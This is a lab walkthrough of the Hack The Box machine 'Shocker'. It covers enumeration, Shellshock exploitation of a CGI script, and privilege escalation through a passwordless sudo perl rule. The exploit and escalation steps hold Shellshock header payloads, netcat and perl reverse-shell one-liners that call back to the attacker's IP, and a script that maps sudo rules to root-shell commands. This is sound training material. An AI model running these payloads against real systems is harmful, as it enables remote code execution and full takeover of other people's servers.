shinobi CTF

Working hard at HTB and CTFs

Hack The Box shocker

shocker

tags: HTB Easy

Procedure

enumeration

  1. nmap scan
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
  1. 80/tcp access
GET / HTTP/1.1
Host: 10.10.10.56

HTTP/1.1 200 OK
Date: Sat, 20 Mar 2021 23:44:56 GMT
Server: Apache/2.4.18 (Ubuntu)
Last-Modified: Fri, 22 Sep 2017 20:01:19 GMT
ETag: "89-559ccac257884"
Accept-Ranges: bytes
Content-Length: 137
Vary: Accept-Encoding
Content-Type: text/html

<!DOCTYPE html>
<html>
<body>

<h2>Don't Bug Me!</h2>
<img src="bug.jpg" alt="bug" style="width:450px;height:350px;">

</body>
</html> 
No further content on the page itself.
  1. 80/tcp nikto
/opt/nikto/program/nikto.pl -h 10.10.10.56
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.56
+ Target Hostname:    10.10.10.56
+ Target Port:        80
+ Start Time:         2021-03-20 21:19:52 (GMT9)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type.
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.46). Apache 2.2.34 is the EOL for the 2.x branch.
+ Server may leak inodes via ETags, header found with file /, inode: 89, size: 559ccac257884, mtime: gzip
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS 
+ OSVDB-3233: /icons/README: Apache default file found.
+ 8862 requests: 0 error(s) and 6 item(s) reported on remote host
+ End Time:           2021-03-20 21:53:04 (GMT9) (1992 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
Nothing of much significance.
  1. 80/tcp dirb
dirb http://10.10.10.56

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sat Mar 20 21:15:08 2021
URL_BASE: http://10.10.10.56/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                      
---- Scanning URL: http://10.10.10.56/ ----
+ http://10.10.10.56/cgi-bin/ (CODE:403|SIZE:294)                                                        
+ http://10.10.10.56/index.html (CODE:200|SIZE:137)                                                      
+ http://10.10.10.56/server-status (CODE:403|SIZE:299)                                                                                                 
-----------------
END_TIME: Sat Mar 20 21:30:31 2021
DOWNLOADED: 4612 - FOUND: 3
Found the /cgi-bin/ directory.
  1. 80/tcp dirsearch
$ python3 dirsearch.py -e "cgi,sh,py,txt,bin" -u http://10.10.10.56/cgi-bin/ 

    _|. _ _  _  _  _ _|_    v0.4.1
    (_||| _) (/_(_|| (_| )

Extensions: cgi, sh, py, txt, bin | HTTP method: GET | Threads: 30 | Wordlist size: 10944

Error Log: /home/ubu/Downloads/dirsearch/logs/errors-21-03-04_00-49-49.log

Target: http://10.10.10.56/cgi-bin/

Output File: /home/ubu/Downloads/dirsearch/reports/10.10.10.56/cgi-bin_21-03-04_00-49-51.txt

[00:49:51] Starting: 
[00:50:06] 403 -  310B  - /cgi-bin/.htaccess.sample
[00:50:06] 403 -  308B  - /cgi-bin/.htaccess.orig
[00:50:06] 403 -  305B  - /cgi-bin/.ht_wsr.txt
[00:50:06] 403 -  308B  - /cgi-bin/.htaccess.bak1
[00:50:06] 403 -  307B  - /cgi-bin/.htaccessOLD2
[00:50:06] 403 -  306B  - /cgi-bin/.htaccessOLD
[00:50:06] 403 -  309B  - /cgi-bin/.htaccess_extra
[00:50:06] 403 -  306B  - /cgi-bin/.htaccessBAK
[00:50:06] 403 -  308B  - /cgi-bin/.htpasswd_test
[00:50:06] 403 -  308B  - /cgi-bin/.htaccess.save
[00:50:06] 403 -  308B  - /cgi-bin/.htaccess_orig
[00:50:06] 403 -  298B  - /cgi-bin/.htm
[00:50:06] 403 -  304B  - /cgi-bin/.htpasswds
[00:50:06] 403 -  305B  - /cgi-bin/.httr-oauth
[00:50:07] 403 -  299B  - /cgi-bin/.html
[00:50:07] 403 -  306B  - /cgi-bin/.htaccess_sc
[00:52:37] 200 -  118B  - /cgi-bin/user.sh

Found the file user.sh.

GET /cgi-bin/user.sh HTTP/1.1
Host: 10.10.10.56

HTTP/1.1 200 OK
Date: Sat, 20 Mar 2021 23:55:58 GMT
Server: Apache/2.4.18 (Ubuntu)
Content-Type: text/x-sh
Content-Length: 118

Content-Type: text/plain

Just an uptime test script

    19:55:58 up 11:41,  0 users,  load average: 0.00, 0.00, 0.00
Nothing much here at first glance... but a CGI script that prints uptime output is a shell script executed by bash under mod_cgi, which is exactly the precondition for Shellshock, so it is worth probing further.
  1. 80/tcp nikto again, this time against the script
$ /opt/nikto/program/nikto.pl -h 10.10.10.56/cgi-bin/user.sh

There are plenty of false positives in the output, but it also finds the Shellshock vulnerability. The request nikto sends and the response it gets back are shown below: the markers injected via the User-Agent and Referer headers are echoed back, so bash on the target executed them.

GET /cgi-bin/user.sh/ HTTP/1.1
Host: 10.10.10.56
Referer: () { _; } >_[$($())] { echo 93e4r0-CVE-2014-6278: true; echo;echo; }
User-Agent: () { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;
Connection: close

HTTP/1.1 200 OK
Date: Sat, 20 Mar 2021 12:35:53 GMT
Server: Apache/2.4.18 (Ubuntu)
93e4r0-CVE-2014-6278: true
Connection: close
Content-Type: text/x-sh
Content-Length: 150


93e4r0-CVE-2014-6271: true



Content-Type: text/plain

Just an uptime test script

    08:35:53 up 21 min,  0 users,  load average: 0.00, 0.01, 0.00

exploit

  1. Use the Shellshock vulnerability to get a reverse shell. First start a listener on the attacking machine (10.10.15.3):
$ nc -lnvp 4445
Then send a request exploiting Shellshock, with the reverse shell one-liner courtesy of [OSCP](https://oscp.infosecsanyam.in/shells/linux-reverse-shell-one-liner):
GET /cgi-bin/user.sh/ HTTP/1.1
Host: 10.10.10.56
User-Agent: () { :;}; echo; /bin/bash -c 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.15.3 4445 >/tmp/f'
Connection: close
$ whoami
shelly

privilege escalation

  1. PEAS
User shelly may run the following commands on Shocker:
    (root) NOPASSWD: /usr/bin/perl

perl can be run as root without a password, and an interpreter that can exec a shell is all that is needed.

  1. Build a reverse shell with perl (thanks again to OSCP) and run it through sudo, with a second listener (nc -lnvp 4446) waiting on the attacking machine:
$ whoami
shelly
$ sudo perl -e 'use Socket;$i="10.10.15.3";$p=4446;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
# whoami
root
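The sudo -l line PEAS reported is the whole privilege escalation, so here is a small triage script for that output: it parses the rules block and maps root-capable entries to a ready-to-type command when the binary is a known shell spawner. This is an added example for this write-up, not code from PEAS or the original post; the sample output is constructed around the single entry shown on the page plus an extra password-protected rule, and the interpreter table is an assumption listing a few common shell-capable binaries rather than an exhaustive list.

```python
"""Triage `sudo -l` output for entries that give a root shell.

Added example for this write-up (not PEAS or the original post). Sample output
is constructed; SHELL_SPAWNERS is an assumed, non-exhaustive table.
"""
import re
from collections import namedtuple

SudoRule = namedtuple("SudoRule", "runas nopasswd command")

# Constructed sample: the Defaults block is what sudo normally prints before
# the rules; the perl rule is the one reported on the box, the vim/cat rule
# is added to exercise password-required and multi-command lines.
SAMPLE_SUDO_L = """\
Matching Defaults entries for shelly on Shocker:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User shelly may run the following commands on Shocker:
    (root) NOPASSWD: /usr/bin/perl
    (ALL : ALL) /usr/bin/vim, /bin/cat /var/log/syslog
"""

# One line of the rules block: "(runas[ : group]) [TAG: ...] cmd[, cmd...]"
_RULE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")

# Assumption: how a few interpreters/editors hand over to /bin/sh under sudo.
SHELL_SPAWNERS = {
    "perl":    "-e 'exec \"/bin/sh\";'",
    "python":  "-c 'import os; os.execl(\"/bin/sh\", \"sh\")'",
    "python3": "-c 'import os; os.execl(\"/bin/sh\", \"sh\")'",
    "ruby":    "-e 'exec \"/bin/sh\"'",
    "vim":     "-c ':!/bin/sh'",
}


def parse_sudo_l(text):
    """Return SudoRule entries from the 'may run the following commands' block."""
    rules = []
    in_rules = False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules:
            continue
        m = _RULE.match(line)
        if not m:
            continue
        runas = m.group("runas").split(":")[0].strip()   # drop the ":group" part
        nopasswd = "NOPASSWD:" in m.group("tags")
        for cmd in m.group("cmds").split(", "):
            rules.append(SudoRule(runas, nopasswd, cmd.strip()))
    return rules


def root_shell_candidates(rules):
    """Map rules that run as root (or ALL) to a sudo command that spawns a
    shell when the binary is a known spawner. Password-protected rules are
    kept, since they still work once the user's own password is known."""
    out = []
    for r in rules:
        if r.runas not in ("root", "ALL"):
            continue
        binary = r.command.split()[0]
        name = binary.rsplit("/", 1)[-1]
        if binary == "ALL":
            out.append((r, "sudo /bin/sh"))
        elif name in SHELL_SPAWNERS:
            out.append((r, "sudo %s %s" % (binary, SHELL_SPAWNERS[name])))
    return out


if __name__ == "__main__":
    for rule, cmd in root_shell_candidates(parse_sudo_l(SAMPLE_SUDO_L)):
        tag = "NOPASSWD" if rule.nopasswd else "password required"
        print("%-18s %-26s -> %s" % (tag, rule.command, cmd))
```

With a shell already in hand, the perl entry does not need a reverse shell at all: sudo /usr/bin/perl -e 'exec "/bin/sh";' gives a root shell in place, which is what the script prints for that rule. The reverse shell in the write-up is useful when the first shell is too unstable to run interactive commands.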

Closing

  • Thanks to the handy tools.